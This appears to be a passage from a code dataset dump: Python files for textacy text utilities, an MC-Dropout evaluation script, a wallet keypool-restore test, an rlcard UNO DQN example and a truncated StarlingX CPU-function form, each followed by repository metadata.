"""Alias of :func:`keyword_in_context <textacy.text_utils.keyword_in_context>`."""
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
    """
    Clean up a sequence of single- or multi-word strings: strip leading/trailing
    junk chars, handle dangling parens and odd hyphenation, etc.

    Args:
        terms: Sequence of terms such as "presidency", "epic failure",
            or "George W. Bush" that may be _unclean_ for whatever reason.

    Yields:
        Next term in ``terms`` with the cruft cleaned up; terms that were
        _entirely_ cruft are dropped.

    Warning:
        Terms with (intentionally) unusual punctuation may get "cleaned"
        into a form that changes or obscures the original meaning of the term.
    """
    for raw in terms:
        # strip leading/trailing junk characters
        term = constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", raw)
        term = constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term)
        # dangling/backwards parens: '(' and ')' must pair up, in order
        if term.count(")") != term.count("(") or term.find(")") < term.find("("):
            term = ""
        elif "(" in term:
            term = constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
        # oddly separated hyphenated words
        if "-" in term:
            term = constants.RE_NEG_DIGIT_TERM.sub(
                r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
            )
        # oddly separated apostrophe'd words
        if "'" in term:
            term = constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term)
        # normalize whitespace, then drop terms with no word characters left
        term = constants.RE_NONBREAKING_SPACE.sub(" ", term).strip()
        if re.search(r"\w", term):
            yield term
| 35.734177
| 90
| 0.626993
|
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
    """Decide whether a single token qualifies as an acronym.

    ``exclude`` lists known false positives that are rejected outright.
    """
    # explicit deny-list takes priority over all structural checks
    if exclude and token in exclude:
        return False
    # empty strings and anything containing a space are rejected
    if not token or " " in token:
        return False
    # a 2-character acronym must be fully upper-case
    if len(token) == 2 and not token.isupper():
        return False
    # all-digit tokens are numbers, not acronyms
    if token.isdigit():
        return False
    # require at least one upper-case letter, or a digit at either end
    has_upper = any(ch.isupper() for ch in token)
    digit_at_edge = token[0].isdigit() or token[-1].isdigit()
    if not has_upper and not digit_at_edge:
        return False
    # between 2 and 10 alphanumeric characters overall
    n_alnum = sum(1 for ch in token if ch.isalnum())
    if not 2 <= n_alnum <= 10:
        return False
    # finally, only certain combinations of letters, digits, and '&/.-'
    return constants.RE_ACRONYM.match(token) is not None
def keyword_in_context(
    text: str,
    keyword: str,
    *,
    ignore_case: bool = True,
    window_width: int = 50,
    print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
    """Search for ``keyword`` in ``text`` via regex; print each occurrence
    with ``window_width`` characters of context (``print_only=True``), or
    return a generator of raw (pre, kw, post) triples (``print_only=False``).
    """
    flags = re.IGNORECASE if ignore_case is True else 0

    def _matches() -> Iterable[Tuple[str, str, str]]:
        # yields (pre, kw, post) per regex match, clamped at text start
        for match in re.finditer(keyword, text, flags=flags):
            yield (
                text[max(0, match.start() - window_width) : match.start()],
                match.group(),
                text[match.end() : match.end() + window_width],
            )

    if print_only is True:
        # Bug fix: previously the ``yield`` in this function's body made the
        # whole function a generator, so print_only=True returned an
        # unconsumed generator and never printed anything.
        for pre, kw, post in _matches():
            print(
                "{pre} {kw} {post}".format(
                    pre=pre.rjust(window_width),
                    kw=kw,
                    post=post.ljust(window_width),
                )
            )
        return None
    return _matches()


KWIC = keyword_in_context
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
    """Clean a sequence of terms in place order: strip junk characters,
    repair dangling parens, odd hyphenation/apostrophes, and whitespace;
    terms that were entirely cruft are dropped.
    """
    for raw in terms:
        # strip leading/trailing junk characters
        term = constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", raw)
        term = constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term)
        # dangling/backwards parens: '(' and ')' must pair up, in order
        if term.count(")") != term.count("(") or term.find(")") < term.find("("):
            term = ""
        elif "(" in term:
            term = constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
        # oddly separated hyphenated words
        if "-" in term:
            term = constants.RE_NEG_DIGIT_TERM.sub(
                r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
            )
        # oddly separated apostrophe'd words
        if "'" in term:
            term = constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term)
        # normalize whitespace, then drop terms with no word characters left
        term = constants.RE_NONBREAKING_SPACE.sub(" ", term).strip()
        if re.search(r"\w", term):
            yield term
| true
| true
|
f7191add8f756794b4712383067b7b7dd7494a69
| 3,495
|
py
|
Python
|
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
# code-checked
# server-checked
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
# M: number of stochastic forward passes averaged per input point
M = 4
# evaluation grid bounds and resolution over the 2-D input space
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
# NOTE(review): network.eval() normally disables nn.Dropout, which would make
# the M forward passes below identical; MC-Dropout requires dropout active at
# inference — confirm ToyNet applies dropout with training=True internally.
network.eval()
# average the class-0 ("false") probability over M passes at each grid point
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
    for x_2_i, x_2_value in enumerate(x_values):
        x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda() # (shape: (1, 2))
        mean_prob_vector = np.zeros((2, ))
        for i in range(M):
            logits = network(x) # (shape: (1, num_classes)) (num_classes==2)
            prob_vector = F.softmax(logits, dim=1) # (shape: (1, num_classes))
            prob_vector = prob_vector.data.cpu().numpy()[0] # (shape: (2, ))
            mean_prob_vector += prob_vector/M_float
        # note the (row, col) = (x_2, x_1) layout expected by pcolormesh
        false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
# predictive density heatmap (color and grayscale variants)
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
# ground truth: points within radius 2.4 of the origin belong to class 0
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
# side-by-side comparison against the HMC reference predictive density
with open("../HMC/false_prob_values.pkl", "rb") as file: # (needed for python3)
    false_prob_values_HMC = pickle.load(file) # (shape: (60, 60))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| 32.971698
| 171
| 0.731903
|
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
# M: number of stochastic forward passes averaged per input point
M = 4
# evaluation grid bounds and resolution over the 2-D input space
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
# NOTE(review): network.eval() normally disables nn.Dropout, which would make
# the M passes below identical; confirm ToyNet keeps dropout active here.
network.eval()
# average the class-0 probability over M passes at each grid point
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
    for x_2_i, x_2_value in enumerate(x_values):
        x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda()
        mean_prob_vector = np.zeros((2, ))
        for i in range(M):
            logits = network(x)
            prob_vector = F.softmax(logits, dim=1)
            prob_vector = prob_vector.data.cpu().numpy()[0]
            mean_prob_vector += prob_vector/M_float
        false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
# predictive density heatmap (color and grayscale variants)
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
# ground truth: points within radius 2.4 of the origin belong to class 0
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
# side-by-side comparison against the HMC reference predictive density
with open("../HMC/false_prob_values.pkl", "rb") as file:
    false_prob_values_HMC = pickle.load(file)
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| true
| true
|
f7191b74ad043bf5a88f00d42e710de35f6e22dd
| 2,969
|
py
|
Python
|
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test HD Wallet keypool restore function.
Two nodes. Node1 is under test. Node0 is providing transactions and generating blocks.
- Start node1, shutdown and backup wallet.
- Generate 110 keys (enough to drain the keypool). Store key 90 (in the initial keypool) and key 110 (beyond the initial keypool). Send funds to key 90 and key 110.
- Stop node1, clear the datadir, move wallet file back into the datadir and restart node1.
- connect node1 to node0. Verify that they sync and node1 receives its funds."""
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
    """HD wallet keypool restore test (see module docstring for the plan)."""
    def set_test_params(self):
        # node0 funds/mines; node1 (small keypool) is the node under test
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.extra_args = [['-keypool=3'], ['-keypool=100']]
    def run_test(self):
        """Back up node1's wallet, drain its keypool, then restore and verify."""
        isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
        self.tmpdir = self.options.tmpdir
        self.nodes[0].generate(101)
        self.log.info("Make backup of wallet")
        self.stop_node(1)
        shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
        self.start_node(1, self.extra_args[1])
        connect_nodes(self.nodes[0], 1)
        self.log.info("Generate keys for wallet")
        # key 90 lies inside the backed-up keypool, key 110 beyond it
        for _ in range(90):
            addr_oldpool = self.nodes[1].getnewaddress()
        for _ in range(20):
            addr_extpool = self.nodes[1].getnewaddress()
        self.log.info("Send funds to wallet")
        self.nodes[0].sendtoaddress(addr_oldpool, 10)
        self.nodes[0].generate(1)
        self.nodes[0].sendtoaddress(addr_extpool, 5)
        self.nodes[0].generate(1)
        self.sync_blocks()
        self.log.info("Restart node with wallet backup")
        self.stop_node(1)
        shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
        self.log.info("Verify keypool is restored and balance is correct")
        self.start_node(1, self.extra_args[1])
        connect_nodes(self.nodes[0], 1)
        self.sync_all()
        # wallet was not backupped after emptying the key pool.
        # Legacy wallet can't recover funds in addr_extpool
        recoveredBalance = 10 if isLegacyWallet else 15
        assert_equal(self.nodes[1].getbalance(), recoveredBalance)
        assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
        # Check that we have marked all keys up to the used keypool key as used
        if not isLegacyWallet:
            assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
    KeypoolRestoreTest().main()
| 37.582278
| 164
| 0.67969
|
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
    """HD wallet keypool restore test: back up node1's wallet, drain the
    keypool past the backup, then restore and verify funds recover."""
    def set_test_params(self):
        # node0 funds/mines; node1 (small keypool) is the node under test
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.extra_args = [['-keypool=3'], ['-keypool=100']]
    def run_test(self):
        """Exercise the backup/drain/restore cycle and check balances."""
        isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
        self.tmpdir = self.options.tmpdir
        self.nodes[0].generate(101)
        self.log.info("Make backup of wallet")
        self.stop_node(1)
        shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
        self.start_node(1, self.extra_args[1])
        connect_nodes(self.nodes[0], 1)
        self.log.info("Generate keys for wallet")
        # key 90 lies inside the backed-up keypool, key 110 beyond it
        for _ in range(90):
            addr_oldpool = self.nodes[1].getnewaddress()
        for _ in range(20):
            addr_extpool = self.nodes[1].getnewaddress()
        self.log.info("Send funds to wallet")
        self.nodes[0].sendtoaddress(addr_oldpool, 10)
        self.nodes[0].generate(1)
        self.nodes[0].sendtoaddress(addr_extpool, 5)
        self.nodes[0].generate(1)
        self.sync_blocks()
        self.log.info("Restart node with wallet backup")
        self.stop_node(1)
        shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
        self.log.info("Verify keypool is restored and balance is correct")
        self.start_node(1, self.extra_args[1])
        connect_nodes(self.nodes[0], 1)
        self.sync_all()
        # backup was taken before the keypool was emptied; a legacy wallet
        # cannot recover the funds sent to addr_extpool
        recoveredBalance = 10 if isLegacyWallet else 15
        assert_equal(self.nodes[1].getbalance(), recoveredBalance)
        assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
        # Check that we have marked all keys up to the used keypool key as used
        if not isLegacyWallet:
            assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
    KeypoolRestoreTest().main()
| true
| true
|
f7191b7831ff3bb9f706d295c3c5cdd09d24319d
| 2,516
|
py
|
Python
|
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | null | null | null |
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | null | null | null |
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | 1
|
2020-11-20T16:38:37.000Z
|
2020-11-20T16:38:37.000Z
|
''' A toy example of training single-agent algorithm on Leduc Hold'em
The environment can be treated as normal OpenAI gym style single-agent environment
'''
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
# Make environments (single-agent mode: env.step returns (state, reward, done))
env = rlcard.make('uno', config={'single_agent_mode': True})
eval_env = rlcard.make('uno', config={'single_agent_mode': True})

# Set the iterations numbers and how frequently we evaluate the performance
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000

# The intial memory size
memory_init_size = 1000

# Train the agent every X steps
train_every = 1

# The paths for saving the logs and learning curves
log_dir = './experiments/uno_single_dqn_result/'

# Set a global seed
set_global_seed(0)

with tf.Session() as sess:
    # Initialize a global step
    global_step = tf.Variable(0, name='global_step', trainable=False)

    # Set up the agent
    agent = DQNAgent(sess,
                     scope='dqn',
                     action_num=env.action_num,
                     replay_memory_init_size=memory_init_size,
                     train_every=train_every,
                     state_shape=env.state_shape,
                     mlp_layers=[128,128])

    # Initialize global variables
    sess.run(tf.global_variables_initializer())

    # Init a Logger to plot the learning curve
    logger = Logger(log_dir)

    state = env.reset()
    for timestep in range(timesteps):
        action = agent.step(state)
        next_state, reward, done = env.step(action)
        ts = (state, action, reward, next_state, done)
        agent.feed(ts)
        # Bug fix: advance the trajectory. Previously ``state`` was never
        # updated, so the agent was always fed transitions from the initial
        # state and finished episodes were never reset.
        if done:
            state = env.reset()
        else:
            state = next_state

        if timestep % evaluate_every == 0:
            # Bug fix: evaluate on ``eval_env``. Previously actions chosen
            # from eval_env's reset state were applied to the training
            # ``env``, and the evaluation state was never advanced. A
            # separate variable keeps the rollout from clobbering the
            # training state above.
            rewards = []
            eval_state = eval_env.reset()
            for _ in range(evaluate_num):
                action, _ = agent.eval_step(eval_state)
                eval_state, reward, done = eval_env.step(action)
                if done:
                    rewards.append(reward)
                    eval_state = eval_env.reset()
            logger.log_performance(env.timestep, np.mean(rewards))

    # Close files in the logger
    logger.close_files()

    # Plot the learning curve
    logger.plot('DQN')

    # Save model
    save_dir = 'models/uno_single_dqn'
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)
    saver = tf.train.Saver()
    saver.save(sess, os.path.join(save_dir, 'model'))
| 29.255814
| 86
| 0.657393
|
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
memory_init_size = 1000
train_every = 1
log_dir = './experiments/uno_single_dqn_result/'
set_global_seed(0)
with tf.Session() as sess:
global_step = tf.Variable(0, name='global_step', trainable=False)
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
sess.run(tf.global_variables_initializer())
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
logger.close_files()
logger.plot('DQN')
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| true
| true
|
f7191be16d1b89c72207a7ef5c87366a86c4b09c
| 17,228
|
py
|
Python
|
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | 1
|
2018-09-18T11:10:53.000Z
|
2018-09-18T11:10:53.000Z
|
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | null | null | null |
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse # noqa
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99: # No Processor
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99: # No Processor
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99: # No Processor
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99: # No Processor
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99: # No Processor
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99: # No Processor
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99: # No Processor
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99: # No Processor
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
